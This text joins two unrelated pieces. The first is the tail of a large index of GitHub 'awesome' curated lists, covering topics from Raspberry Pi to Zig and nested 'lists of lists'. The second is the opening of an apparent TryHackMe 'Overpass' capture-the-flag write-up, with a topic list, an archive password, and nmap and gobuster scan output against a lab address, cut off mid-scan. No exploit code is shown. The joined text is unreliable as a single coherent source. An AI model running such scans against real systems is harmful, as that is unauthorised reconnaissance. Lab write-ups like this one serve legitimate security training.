@blackout314 - http://blackout314.github.io/awesome-raspberry-pi/ * [awesome-raspberry-pi](https://github.com/thibmaek/awesome-raspberry-pi) by @thibmaek – Raspberry Pi tools, projects, images and resources * [awesome-react](https://github.com/enaqx/awesome-react) – ReactJS tools, resources, videos. * [awesome-react-components](https://github.com/brillout/awesome-react-components) – React Components & Libraries. * [awesome-react-graphql](https://github.com/hasura/awesome-react-graphql) – GraphQL + React/React Native * [awesome-react-hooks](https://github.com/glauberfc/awesome-react-hooks) – React Hooks * [awesome-react-native](https://github.com/jondot/awesome-react-native) - http://www.awesome-react-native.com * [awesome-react-state-management](https://github.com/olegrjumin/awesome-react-state-management) * [awesome-react-state-management-tools](https://github.com/cs01/awesome-react-state-management-tools) * [awesome-readme](https://github.com/matiassingers/awesome-readme) – READMEs examples and best practices * [awesome-reasonml](https://github.com/vramana/awesome-reasonml) – [ReasonML](https://reasonml.github.io/), [BuckleScript](https://bucklescript.github.io/) and [OCaml](https://ocaml.org/) programming languages. * [awesome-recommender-system](https://github.com/Geek4IT/awesome-recommender-system) – Recommender System frameworks, libraries and software. * [awesome-recursion-schemes](https://github.com/passy/awesome-recursion-schemes) * [awesome-redux](https://github.com/brillout/awesome-redux) by @brillout – Redux Libraries & Learning Material - https://devarchy.com/redux * [awesome-redux](https://github.com/xgrommx/awesome-redux) by @xgrommx – [Redux](https://github.com/rackt/redux) web application state container * [awesome-refinerycms](https://github.com/refinerycms-contrib/awesome-refinerycms) – [Refinery](https://www.refinerycms.com/) Ruby on Rails CMS * [awesome-regex](https://github.com/aloisdg/awesome-regex) – Regular expressions * [awesome-regression-testing](https://github.com/mojoaxel/awesome-regression-testing) – Visual regression testing * [awesome-relay](https://github.com/expede/awesome-relay) – [Relay](https://relay.dev/) JavaScript framework for React and GraphQL * [awesome-reMarkable](https://github.com/reHackable/awesome-reMarkable) – [reMarkable](https://remarkable.com/) e-ink tablet. * [awesome-remote-companies](https://github.com/fireball787b/awesome-remote-companies) – Remote companies with values and work-life balance culture. * [awesome-remote-job](https://github.com/lukasz-madon/awesome-remote-job) – Remote companies and other resources. * [awesome-RemoteWork](https://github.com/hugo53/awesome-RemoteWork) – Books and links about and for remote work. * [awesome-research](https://github.com/emptymalei/awesome-research) – Tools to help you with research/life - http://openmetric.org/tool/ * [awesome-rest](https://github.com/marmelab/awesome-rest) – Great resources about RESTful API architecture, development, test, and performance * [awesome-rethinkdb](https://github.com/d3viant0ne/awesome-rethinkdb) – [RethinkDB](https://rethinkdb.com/) realtime database * [awesome-retrospectives](https://github.com/josephearl/awesome-retrospectives) – Facilitating and learning about retrospectives. * [awesome-rhasspy](https://github.com/koenvervloesem/awesome-rhasspy) – [Rhasspy](https://rhasspy.readthedocs.io/) voice assistant. * [awesome-ripple](https://github.com/vhpoet/awesome-ripple) – [Ripple](https://ripple.com/) cryptocurrency * [awesome-rl](https://github.com/aikorea/awesome-rl) – Reinforcement Learning. * [awesome-rl-for-cybersecurity](https://github.com/Limmen/awesome-rl-for-cybersecurity) – Reinforcement learning applied to cyber security. * [awesome-rnn](https://github.com/kjw0612/awesome-rnn) – Recurrent Neural Networks. * [awesome-roadmaps](https://github.com/liuchong/awesome-roadmaps) – Skills roadmaps for software development * [awesome-roam](https://github.com/roam-unofficial/awesome-roam) – Roam Research networked note-taking * [awesome-robotics](https://github.com/Kiloreux/awesome-robotics) * [awesome-ros2](https://github.com/fkromer/awesome-ros2) – [Robot Operating System](http://www.ros.org/) - https://fkromer.github.io/awesome-ros2 * [awesome-roslyn](https://github.com/ironcev/awesome-roslyn) – Roslyn .NET Compiler Platform * [awesome-rshiny](https://github.com/grabear/awesome-rshiny) – A curated list of resources for the R shiny package. - https://grabear.github.io/awesome-rshiny/ * [awesome-ruby](https://github.com/markets/awesome-ruby) by @markets - http://awesome-ruby.com/ * [awesome-ruby](https://github.com/Sdogruyol/awesome-ruby) by @Sdogruyol * [awesome-ruby-ast](https://github.com/rajasegar/awesome-ruby-ast) – Abstract Syntax Trees (AST) in Ruby * [AwesomeRubyist/awesome_podcast_list](https://github.com/AwesomeRubyist/awesome_podcast_list) – Podcasts about Ruby and development, also in Russian. * [AwesomeRubyist/awesome_reading_list](https://github.com/AwesomeRubyist/awesome_reading_list) – Books about Ruby and Rails. * [AwesomeRubyist/awesome_resource_list](https://github.com/AwesomeRubyist/awesome_resource_list) – Resources for Ruby and Rails. * [awesome-rust](https://github.com/rust-unofficial/awesome-rust) * [awesome-rxjava](https://github.com/eleventigers/awesome-rxjava) – RxJava, reactive programming library * [awesome-salesforce](https://github.com/mailtoharshit/awesome-salesforce) – Salesforce Platform Resources * [awesome-saltstack](https://github.com/hbokh/awesome-saltstack) – [SaltStack](https://www.saltstack.com/) configuration management * [awesome-sarl](https://github.com/sarl/awesome-sarl) – Resources for [SARL](http://www.sarl.io/) Agent-Oriented Programming Language. * [awesome-SAS](https://github.com/huyingjie/awesome-SAS) – [SAS](https://www.sas.com/) analysis system * [awesome-sass](https://github.com/Famolus/awesome-sass) by @Famolus – Sass and SCSS CSS preprocessor * [awesome-sass](https://github.com/HugoGiraudel/awesome-sass) by @HugoGiraudel – Sass and SCSS CSS preprocessor * [awesome-satellite-imagery-datasets](https://github.com/chrieke/awesome-satellite-imagery-datasets) – Satellite imagery datasets with annotations for computer vision and deep learning. * [awesome-scala](https://github.com/lauris/awesome-scala) – Scala programming language * [awesome-scala-native](https://github.com/tindzk/awesome-scala-native) – [Scala Native](http://www.scala-native.org) compiler * [awesome-scalability](https://github.com/binhnguyennus/awesome-scalability) – The Patterns of Scalable, Reliable, and Performant Large-Scale Systems * [awesome-scientific-computing](https://github.com/nschloe/awesome-scientific-computing) – Software for numerical analysis * [awesome-scientific-writing](https://github.com/writing-resources/awesome-scientific-writing) – Tools, demos and resources to go beyond LaTeX. * [awesome-scriptable](https://github.com/dersvenhesse/awesome-scriptable) – [Scriptable](https://scriptable.app/) iOS app for automation with JavaScript. * [awesome-sdn](https://github.com/sdnds-tw/awesome-sdn) – Software Defined Network (SDN) * [awesome-sec-talks](https://github.com/PaulSec/awesome-sec-talks) – Security talks. * [awesome-security](https://github.com/sbilly/awesome-security) – Software, libraries, documents, books, resources and cool stuff about security. * [awesome-selenium](https://github.com/christian-bromann/awesome-selenium) * [awesome-selfhosted](https://github.com/awesome-selfhosted/awesome-selfhosted) – Network services and web applications which can be hosted locally. * [awesome-semantic-web](https://github.com/semantalytics/awesome-semantic-web) – Semantic web and linked data * [awesome-seo](https://github.com/teles/awesome-seo) – SEO (Search Engine Optimization) links. - http://jotateles.com.br/awesome-seo/ * [awesome-serverless](https://github.com/anaibol/awesome-serverless) by @anaibol – Services, solutions and resources for serverless / nobackend applications. * [awesome-serverless](https://github.com/pmuens/awesome-serverless) by @pmuens – Resources related to serverless computing and serverless architectures. * [awesome-serverless-security](https://github.com/puresec/awesome-serverless-security) – Serverless security resources * [awesome-service-workers](https://github.com/TalAter/awesome-service-workers) – Service Workers for Progressive Web Applications * [awesome-servicefabric](https://github.com/lawrencegripper/awesome-servicefabric) – Azure [Service Fabric](https://docs.microsoft.com/en-us/azure/service-fabric/) distributed services platform * [awesome-services](https://github.com/indrasantosa/awesome-services) – Services that make a painful programmer's life easier. * [awesome-sharepoint](https://github.com/BSUG/awesome-sharepoint) by @BSUG * [awesome-SharePoint](https://github.com/siaf/awesome-SharePoint) by @siaf * [awesome-sheet-music](https://github.com/ad-si/awesome-sheet-music) – Sheet music software, libraries and resources. * [awesome-shell](https://github.com/alebcay/awesome-shell) – Command-line frameworks, toolkits, guides and gizmos. * [awesome-sites](https://github.com/Gherciu/awesome-sites) – Various websites with resources for development, graphics, and learning * [awesome-sketch](https://github.com/diessica/awesome-sketch) – Guides, articles, videos about [Sketch 3](http://www.sketchapp.com/). * [awesome-slack](https://github.com/filipelinhares/awesome-slack) by @filipelinhares – Communities powered by Slack. * [awesome-slack](https://github.com/matiassingers/awesome-slack) by @matiassingers * [awesome-slack-communities](https://github.com/radermacher/awesome-slack-communities) – Public Slack Communities. * [awesome-smart-tv](https://github.com/vitalets/awesome-smart-tv) – Smart TV apps * [awesome-software-architecture](https://github.com/mehdihadeli/awesome-software-architecture) by @mehdihadeli – Software architecture, patterns, and principles. * [awesome-software-architecture](https://github.com/simskij/awesome-software-architecture) by @simskij – Design, reason around and build software using architectural patterns and methods * [awesome-software-craftsmanship](https://github.com/benas/awesome-software-craftsmanship) – [Software craftsmanship](http://manifesto.softwarecraftsmanship.org/) resources to help learn the craft. * [awesome-software-patreons](https://github.com/uraimo/awesome-software-patreons) – Programmers and software-related Patreon accounts. * [awesome-software-quality](https://github.com/ligurio/awesome-software-quality) – Free software testing books. * [awesome-solid](https://github.com/kustomzone/awesome-solid) – [Solid](https://solidproject.org/) (social linked data) project. * [awesome-sound](https://github.com/hwclass/awesome-sound) – Sound & audio libraries and resources. * [awesome-spanish-nlp](https://github.com/dav009/awesome-spanish-nlp) – Linguistic Resources for doing NLP & CL on Spanish * [awesome-spark](https://github.com/awesome-spark/awesome-spark) – Apache Spark packages and resources. * [awesome-speakers](https://github.com/karlhorky/awesome-speakers) – Speakers in the programming and design communities * [awesome-sphinxdoc](https://github.com/yoloseem/awesome-sphinxdoc) – Tools for Sphinx Python Documentation Generator. * [awesome-split-keyboards](https://github.com/diimdeep/awesome-split-keyboards) – Ergonomic split keyboards. * [awesome-sqlalchemy](https://github.com/dahlia/awesome-sqlalchemy) – Extra libraries for SQLAlchemy, a Python ORM. * [awesome-sqlite](https://github.com/atharen/awesome-sqlite) by @atharen * [awesome-sqlite](https://github.com/mindreframer/awesome-sqlite) by @mindreframer * [awesome-sqlite](https://github.com/planetopendata/awesome-sqlite) by @planetopendata * [awesome-sre](https://github.com/dastergon/awesome-sre) – Site Reliability and Production Engineering - https://sre.xyz * [awesome-ssh](https://github.com/moul/awesome-ssh) - https://manfred.life/awesome-ssh * [awesome-stacks](https://github.com/stackshareio/awesome-stacks) – Tech stacks for building different applications & features - https://awesomestacks.dev * [awesome-standard](https://github.com/standard/awesome-standard) – Documenting the explosion of packages in the [standard](http://standardjs.com/) (JavaScript code style) ecosystem. * [awesome-stars](https://github.com/lichunqiang/awesome-stars) _In Chinese_ – Useful libraries with personal remarks. * [awesome-startup](https://github.com/KrishMunot/awesome-startup) – Resources to build your own startup * [awesome-static-generators](https://github.com/myles/awesome-static-generators) – Static web site generators. * [awesome-static-website-services](https://github.com/agarrharr/awesome-static-website-services) * [awesome-steam](https://github.com/scholtzm/awesome-steam) – Steam video games distribution platform development * [awesome-storybook](https://github.com/lauthieb/awesome-storybook) – [Storybook](https://storybook.js.org/) UI web development * [awesome-streaming](https://github.com/manuzhang/awesome-streaming) – Streaming frameworks, applications, etc * [awesome-structure-editors](https://github.com/yairchu/awesome-structure-editors) – Projectional and structural code editor projects. * [awesome-styleguides](https://github.com/RichardLitt/awesome-styleguides) * [awesome-stylelint](https://github.com/stylelint/awesome-stylelint) – [Stylelint](https://stylelint.io/) CSS linter. * [awesome-sustainable-technology](https://github.com/protontypes/awesome-sustainable-technology) – Open technology projects sustaining stable climate, energy supply and vital natural resources. - https://opensustain.tech/ * [awesome-svelte](https://github.com/CalvinWalzel/awesome-svelte) – [Svelte](https://svelte.dev/) framework * [awesome-svelte-resources](https://github.com/ryanatkn/awesome-svelte-resources) – [Svelte](https://svelte.dev/) framework * [awesome-svg](https://github.com/willianjusten/awesome-svg) * [awesome-swedish-opensource](https://github.com/gurre/awesome-swedish-opensource) – Open-source projects from Swedes * [awesome-swift](https://github.com/matteocrippa/awesome-swift) by @matteocrippa * [awesome-swift](https://github.com/Wolg/awesome-swift) by @Wolg * [awesome-swift-and-tutorial-resources](https://github.com/MaxChen/awesome-swift-and-tutorial-resources) – Swift programming language * [Awesome-Swift-Education](https://github.com/hsavit1/Awesome-Swift-Education) – Learn some Swift * [Awesome-Swift-Playgrounds](https://github.com/uraimo/Awesome-Swift-Playgrounds) – Swift Playgrounds * [awesome-symfony](https://github.com/sitepoint-editors/awesome-symfony) – [Symfony PHP framework](http://symfony.com/) bundles, utilities and resources. * [awesome-symfony-education](https://github.com/pehapkari/awesome-symfony-education) – Symfony PHP framework learning resources * [awesome-sysadmin](https://github.com/kahun/awesome-sysadmin) by @kahun – Open source sysadmin resources. * [awesome-sysadmin](https://github.com/n1trux/awesome-sysadmin) by @n1trux – Open source sysadmin resources. * [awesome-system-design](https://github.com/madd86/awesome-system-design) – Distributed systems design * [awesome-system-fonts](https://github.com/mrmrs/awesome-system-fonts) – Websites that use system fonts. * [Awesome-System-for-Machine-Learning](https://github.com/HuaizhengZhang/Awesome-System-for-Machine-Learning) – Research in machine learning systems (MLSys). - https://ai-engineering.club/ * [awesome-taglines](https://github.com/miketheman/awesome-taglines) – Software taglines * [awesome-tailwindcss](https://github.com/aniftyco/awesome-tailwindcss) – [Tailwind CSS](https://tailwindcss.com/) - https://git.io/awesome-tailwindcss * [awesome-talks](https://github.com/JanVanRyswyck/awesome-talks) * [awesome-tap](https://github.com/sindresorhus/awesome-tap) – Test Anything Protocol * [awesome-tech-blogs](https://github.com/markodenic/awesome-tech-blogs) – Technical blogs - https://tech-blogs.dev/ * [awesome-tech-conferences](https://github.com/trstringer/awesome-tech-conferences) – Upcoming technical conferences. * [awesome-tech-videos](https://github.com/lucasviola/awesome-tech-videos) – Tech conferences from youtube, vimeo, etc for us to get inspired * [awesome-technical-writing](https://github.com/BolajiAyodeji/awesome-technical-writing) * [awesome-telegram](https://github.com/ebertti/awesome-telegram) – Telegram messaging service * [awesome-template-literal-types](https://github.com/ghoullier/awesome-template-literal-types) – TypeScript template literal types. * [awesome-tensorflow](https://github.com/jtoy/awesome-tensorflow) – [TensorFlow](https://www.tensorflow.org/) machine intelligence library. * [awesome-terraform](https://github.com/shuaibiyy/awesome-terraform) – HashiCorp Terraform * [awesome-test-automation](https://github.com/atinfo/awesome-test-automation) - http://automated-testing.info * [awesome-testing](https://github.com/TheJambo/awesome-testing) – Testing resources - https://git.io/v1hSm * [awesome-text-editing](https://github.com/dok/awesome-text-editing) – Text editing resources and libraries for the web * [awesome-textpattern](https://github.com/drmonkeyninja/awesome-textpattern) – Textpattern plugins and resources * [awesome-themes](https://github.com/AdrienTorris/awesome-themes) – Web themes and templates * [awesome-tikz](https://github.com/xiaohanyu/awesome-tikz) – [TikZ](https://pgf-tikz.github.io/) graph drawing package for TeX/LaTeX/ConTeXt * [awesome-tinkerpop](https://github.com/mohataher/awesome-tinkerpop) – [Apache TinkerPop](http://tinkerpop.apache.org/) graph computing framework * [awesome-torch](https://github.com/carpedm20/awesome-torch) – Tutorials, projects and communities for [Torch](http://torch.ch/), a scientific computing framework for LuaJIT. * [awesome-transit](https://github.com/CUTR-at-USF/awesome-transit) – Transit APIs, apps, datasets, research, and software * [awesome-tunneling](https://github.com/anderspitman/awesome-tunneling) – [Ngrok](https://ngrok.com/) alternatives and other ngrok-like tunneling software and services. Focus on self-hosting. * [awesome-twilio](https://github.com/Twilio-org/awesome-twilio) – Curated repository of useful and generally awesome Twilio tools and technologies * [awesome-twitter-tools](https://github.com/hridaydutta123/awesome-twitter-tools) – Twitter research: tools, libraries, papers, browser extensions, datasets, and public lists. * [AwesomeTwitterAccounts](https://github.com/yask123/AwesomeTwitterAccounts) – Twitter accounts, organised by programming communities. * [awesome-typescript](https://github.com/dzharii/awesome-typescript) by @dzharii – TypeScript programming language * [awesome-typescript](https://github.com/ellerbrock/awesome-typescript) by @ellerbrock - https://ellerbrock.github.io/awesome-typescript * [awesome-typescript-projects](https://github.com/brookshi/awesome-typescript-projects) – TypeScript open-source projects * [awesome-typography](https://github.com/Jolg42/awesome-typography) – Resources on OpenType & TrueType. * [awesome-ui-component-library](https://github.com/anubhavsrivastava/awesome-ui-component-library) – Framework component libraries for UI styles/toolkit - https://anubhavsrivastava.github.io/awesome-ui-component-library/ * [awesome-umbraco](https://github.com/umbraco-community/awesome-umbraco) – Resources for Umbraco 7, a .NET CMS. * [Awesome-Unicode](https://github.com/Wisdom/Awesome-Unicode) – Unicode tidbits, packages and resources. - https://git.io/Awesome-Unicode * [awesome-unity](https://github.com/RyanNielson/awesome-unity) – Assets and resources for [Unity](http://unity3d.com/) game engine. * [awesome-unix](https://github.com/sirredbeard/Awesome-UNIX) * [awesome-userscripts](https://github.com/brunocvcunha/awesome-userscripts) * [awesome-uses](https://github.com/wesbos/awesome-uses) – `/uses` pages detailing developer setups, gear, software and configs. - https://uses.tech * [awesome-uxn](https://github.com/hundredrabbits/awesome-uxn) – The [Uxn](https://100r.co/site/uxn.html) ecosystem is a personal computing playground, created to host small tools and games, programmable in its own unique assembly language. * [awesome-v](https://github.com/vlang/awesome-v) – [V](https://vlang.io/) programming language * [awesome-vagrant](https://github.com/iJackUA/awesome-vagrant) * [awesome-vanilla-js](https://github.com/davidhund/awesome-vanilla-js) – Plain—‘Vanilla’—JavaScript * [awesome-vapor](https://github.com/Cellane/awesome-vapor) – [Vapor](https://vapor.codes/) Swift web framework * [awesome-vector-tiles](https://github.com/mapbox/awesome-vector-tiles) – Implementations of the [Mapbox Vector Tile](https://www.mapbox.com/developers/vector-tiles/) specification. * [awesome-vehicle-security](https://github.com/jaredthecoder/awesome-vehicle-security) – Vehicle security and car hacking * [awesome-vhdl](https://github.com/VHDL/awesome-vhdl) – VHDL hardware description language * [awesome-vim](https://github.com/akrawchyk/awesome-vim) by @akrawchyk * [awesome-vim](https://github.com/matteocrippa/awesome-vim) by @matteocrippa * [awesome-vite](https://github.com/vitejs/awesome-vite) – [Vite](https://vitejs.dev/) front-end build tooling. * [awesome-vlc](https://github.com/mfkl/awesome-vlc) – [VideoLAN VLC](https://www.videolan.org/) multimedia player and framework. * [awesome-volt](https://github.com/heri/awesome-volt) – [Volt](http://voltframework.com/) Ruby web framework. * [awesome-vorpal](https://github.com/vorpaljs/awesome-vorpal) – [Vorpal](http://vorpal.js.org/) Node.js interactive CLI framework * [awesome-vscode](https://github.com/viatsko/awesome-vscode) – Visual Studio Code - https://viatsko.github.io/awesome-vscode/ * [awesome-vue](https://github.com/vuejs/awesome-vue) – Resources for [Vue.js](http://vuejs.org/) JavaScript UI library. * [awesome-vue-graphql](https://github.com/hasura/awesome-vue-graphql) – GraphQL + Vue.js * [awesome-vulkan](https://github.com/vinjn/awesome-vulkan) – [3D graphics and compute API](https://www.khronos.org/vulkan/) * [awesome-wagtail](https://github.com/springload/awesome-wagtail) – [Wagtail](https://wagtail.io/) Python CMS * [awesome-wasm](https://github.com/mbasso/awesome-wasm) – WebAssembly * [awesome-watchos](https://github.com/yenchenlin/awesome-watchos) – Apple watchOS * [awesome-wayland](https://github.com/natpen/awesome-wayland) – [Wayland](https://wayland.freedesktop.org/) display protocol for Linux. * [awesome-web-animation](https://github.com/sergey-pimenov/awesome-web-animation) – Web animation libraries, books, apps etc. - https://awesome-web-animation.netlify.com * [awesome-web-archiving](https://github.com/iipc/awesome-web-archiving) – Getting started with web archiving * [awesome-web-design](https://github.com/nicolesaidy/awesome-web-design) – Resources for digital designers. * [awesome-web-effect](https://github.com/lindelof/awesome-web-effect) – Exquisite and compact web page effects. * [awesome-web-performance-budget](https://github.com/pajaydev/awesome-web-performance-budget) * [awesome-web-scraping](https://github.com/lorien/awesome-web-scraping) – tools and programming libraries related to web scraping and data processing * [awesome-web-security](https://github.com/qazbnm456/awesome-web-security) - https://awesomelists.top/#/repos/qazbnm456/awesome-web-security * [awesome-webaudio](https://github.com/notthetup/awesome-webaudio) – WebAudio packages and resources. * [awesome-webauthn](https://github.com/herrjemand/awesome-webauthn) – WebAuthn/FIDO2 * [awesome-webcomponents](https://github.com/obetomuniz/awesome-webcomponents) * [Awesome-WebExtensions](https://github.com/fregante/Awesome-WebExtensions) – WebExtensions development. * [awesome-webgl](https://github.com/sjfricke/awesome-webgl) – WebGL libraries, resources and much more * [awesome-webpack](https://github.com/webpack-contrib/awesome-webpack) – Webpack resources, libraries and tools * [awesome-webpack-perf](https://github.com/iamakulov/awesome-webpack-perf) – Webpack tools for web performance * [awesome-webservice](https://github.com/wapmorgan/awesome-webservice) – Web and cloud services, SaaS. * [awesome-websockets](https://github.com/facundofarias/awesome-websockets) – Websocket libraries and resources. * [awesome-webvis](https://github.com/rajsite/awesome-webvis) – [WebVI](http://www.webvi.io/) examples made using [LabVIEW](http://www.ni.com/en-us/support/software-technology-preview.html) systems engineering software. * [awesome-wechat-weapp](https://github.com/justjavac/awesome-wechat-weapp) _In Chinese_ – WeChat mini-programs development * [awesome-weekly](https://github.com/jondot/awesome-weekly) – Quality weekly subscription newsletters from the software world. * [awesome-wicket](https://github.com/PhantomYdn/awesome-wicket) – [Apache Wicket](http://wicket.apache.org/) Java web framework * [awesome-wikipedia](https://github.com/emijrp/awesome-wikipedia) – Wikipedia-related frameworks, libraries, software, datasets and references. * [Awesome-Windows/Awesome](https://github.com/Awesome-Windows/Awesome) – Applications and tools for Windows. * [awesome-wordpress](https://github.com/dropndot/awesome-wordpress) by @dropndot * [awesome-wordpress](https://github.com/endel/awesome-wordpress) by @endel * [awesome-wordpress](https://github.com/miziomon/awesome-wordpress) by @miziomon * [awesome-workflow-engines](https://github.com/meirwah/awesome-workflow-engines) – Open source workflow engines * [awesome-workshopper](https://github.com/therebelrobot/awesome-workshopper) * [awesome-wpo](https://github.com/davidsonfellipe/awesome-wpo) – Web Performance Optimization * [awesome-xamarin](https://github.com/XamSome/awesome-xamarin) by @XamSome – [Xamarin](https://visualstudio.microsoft.com/xamarin/) mobile application framework * [awesome-xamarin](https://github.com/XamSome/awesome-xamarin) by @XamSome – Interesting libraries/tools for Xamarin mobile projects * [awesome-xcode-plugin](https://github.com/aashishtamsya/awesome-xcode-scripts) – XCode IDE scripts * [awesome-xmpp](https://github.com/bluszcz/awesome-xmpp) – Curated list of awesome XMPP protocol resources. * [awesome-yamada](https://github.com/supermomonga/awesome-yamada) – Dancing yamada * [awesome-yaml](https://github.com/datatxt/awesome-yaml) by @datatxt – YAML (Ain't Markup Language) Goodies for Structured (Meta) Data in Text. * [awesome-yaml](https://github.com/dreftymac/awesome-yaml) by @dreftymac * [awesome-yii](https://github.com/iJackUA/awesome-yii) – Yii PHP framework extensions, tutorials and other nice things. * [awesome-ynab](https://github.com/scottrobertson/awesome-ynab) – [You Need A Budget](https://www.youneedabudget.com/) * [awesome-youtubers](https://github.com/JoseDeFreitas/awesome-youtubers) – YouTubers that teach about technology. * [awesome-zig](https://github.com/nrdmn/awesome-zig) – [Zig](https://ziglang.org/) programming language. * [awesome-zsh-plugins](https://github.com/unixorn/awesome-zsh-plugins) * [awesomo](https://github.com/lk-geimfari/awesomo) – Open source projects in various languages. * [craftcms/awesome](https://github.com/craftcms/awesome) – [Craft CMS](https://craftcms.com/) * [not-awesome-es6-classes](https://github.com/petsel/not-awesome-es6-classes) – Why ES6 (aka ES2015) classes are NOT awesome - https://matthias-endler.de/awesome-static-analysis/ ## Lists of lists * [academics-on-mastodon](https://github.com/nathanlesage/academics-on-mastodon) – A list of various lists consisting of academics on Mastodon. * [awesome](https://github.com/sindresorhus/awesome) – A curated list of awesome lists. * [awesome-all](https://github.com/bradoyler/awesome-all) – A curated list of awesome lists of awesome frameworks, libraries and software * [awesome-android-awesomeness](https://github.com/yongjhih/awesome-android-awesomeness#awesomeness) * [awesome-awesome](https://github.com/aligoren/awesome-awesome) by @aligoren – List of GitHub Lists * [awesome-awesome](https://github.com/emijrp/awesome-awesome) by @emijrp – A curated list of awesome curated lists of many topics. * [awesome-awesome](https://github.com/erichs/awesome-awesome) by @erichs – A curated list of awesome curated lists! Inspired by inspiration. * [awesome-awesome](https://github.com/oyvindrobertsen/awesome-awesome) by @oyvindrobertsen – A curated list of curated lists of libraries, resources and shiny things for various languages. * [awesome-awesome-prompts](https://github.com/DukeLuo/awesome-awesome-prompts) – An awesome list for collecting awesome lists related to prompt engineering. * [awesome-awesomeness](https://github.com/bayandin/awesome-awesomeness) – A curated list of awesome awesomeness * [awesome-awesomeness-zh_CN](https://github.com/justjavac/awesome-awesomeness-zh_CN) _In Chinese_ – 中文版awesome list 系列文章 * [awesome-awesomes](https://github.com/fleveque/awesome-awesomes) – Awesome collection of awesome lists of libraries, tools, frameworks and software for any programming language * [awesome-collection](https://github.com/flyhigher139/awesome-collection) – A list of awesome repos. * [Awesome-Hacking](https://github.com/Hack-with-Github/Awesome-Hacking) – Lists for hackers, pentesters and security researchers. * [awesome-lists](https://github.com/cuuupid/awesome-lists) by @cuuupid – A curated list of curated lists. * [awesome-lists](https://github.com/pshah123/awesome-lists) by @pshah123 – A curated list for your curated lists, including other curated lists of curated lists that may or may not contain other curated lists. * [curated-lists](https://github.com/learn-anything/curated-lists) * [delightful](https://codeberg.org/teaserbot-labs/delightful) – Home of delightful curated lists of free software, open science and information sources. * [delightful-club](https://codeberg.org/yarmo/delightful-club) – The delightful curated list of delightful curated lists - https://delightful.club/ * [getAwesomeness](https://github.com/panzhangwang/getAwesomeness) – Explorer designed for curated awesome list hosted on Github - https://getawesomeness.herokuapp.com/ * [list-of-lists](https://github.com/cyrusstoller/list-of-lists) – A meta list of lists of useful open source projects and developer tools. * [ListOfGithubLists](https://github.com/asciimoo/ListOfGithubLists) – List of github lists * [more-awesome](https://github.com/0ex/more-awesome) – An extensive list of "awesome" lists to help you find resources and starting points on every topic. * [must-watch-list](https://github.com/adrianmoisey/must-watch-list) – List of must-watch lists. * [this one](https://github.com/jnv/lists) * [wiki](https://github.com/huguangju/wiki) _In Chinese_ – A curated list of awesome lists. ### Lists of lists of lists * [awesome-awesome-awesome](https://github.com/geekan/awesome-awesome-awesome) by @geekan – An awesome-awesome list. * [awesome-awesome-awesome](https://github.com/t3chnoboy/awesome-awesome-awesome) by @t3chnoboy – A a curated list of curated lists of awesome lists. * [awesomecubed](https://github.com/hunterboerner/awesomecubed) – A curated list of awesome awesomeness awesomenesses. * [lologl](https://github.com/yaph/lologl) – List of Lists of Github Lists. * [meta-awesome](https://github.com/PatrickMcDonald/meta-awesome) * [the one above](#lists-of-lists) #### Lists of lists of lists of lists * [awesome-awesome-awesome-awesome](https://github.com/sindresorhus/awesome-awesome-awesome-awesome) * [the one above](#lists-of-lists-of-lists) ##### Lists of lists of lists of lists of lists * [awesome-power-of-5](https://github.com/therebelbeta/awesome-power-of-5) * [the one above](#lists-of-lists-of-lists-of-lists) ###### Lists of lists of lists of lists of lists of lists * [the one above](#lists-of-lists-of-lists-of-lists-of-lists) ###### Lists of lists of lists of lists of lists of lists of lists * [awesome-awesome-awesome-awesome-awesome-awesome-awesome](https://github.com/sparanoid/awesome-awesome-awesome-awesome-awesome-awesome-awesome) * [the one above](#lists-of-lists-of-lists-of-lists-of-lists-of-lists) <!-- lists-end --> ## License [![CC0 Public Domain](http://i.creativecommons.org/p/zero/1.0/88x31.png)](http://creativecommons.org/publicdomain/zero/1.0/) Social preview photo by [Eli Francis](https://unsplash.com/@elifrancis?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com/s/photos/books-clutter?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText).
# Overpass What happens when some broke CompSci students make a password manager? [Overpass](https://tryhackme.com/room/overpass) ## Topic's - Network Enumeration - Web Enumeration - Web Poking - Cookie Manipulation - Brute Forcing (SSH) - Cryptography - ROT47 - Linux Enumeration - Exploiting Crontab - Abusing SUID/GUID - Misconfigured Binaries ## Appendix archive Password: `1 kn0w 1 5h0uldn'7!` ## Overpass What happens when a group of broke Computer Science students try to make a password manager? Obviously a perfect commercial success! There is a TryHackMe subscription code hidden on this box. The first person to find and activate it will get a one month subscription for free! If you're already a subscriber, why not give the code to a friend? UPDATE: The code is now claimed. The machine was slightly modified on 2020/09/25. This was only to improve the performance of the machine. It does not affect the process. ``` kali@kali:~/CTFs/tryhackme/Overpass$ sudo nmap -p- -sC -sV -Pn 10.10.134.43 [sudo] password for kali: Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 17:16 CEST Nmap scan report for 10.10.134.43 Host is up (0.040s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA) | 256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA) |_ 256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519) 80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) |_http-title: Overpass Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 49.35 seconds ``` ``` kali@kali:~/CTFs/tryhackme/Overpass$ gobuster dir -u http://10.10.134.43/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.134.43/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/10/05 17:18:08 Starting gobuster =============================================================== /img (Status: 301) /downloads (Status: 301) /aboutus (Status: 301) /admin (Status: 301) /css (Status: 301) /http%3A%2F%2Fwww (Status: 301) /http%3A%2F%2Fyoutube (Status: 301) /http%3A%2F%2Fblogs (Status: 301) /http%3A%2F%2Fblog (Status: 301) /**http%3A%2F%2Fwww (Status: 301) Progress: 83630 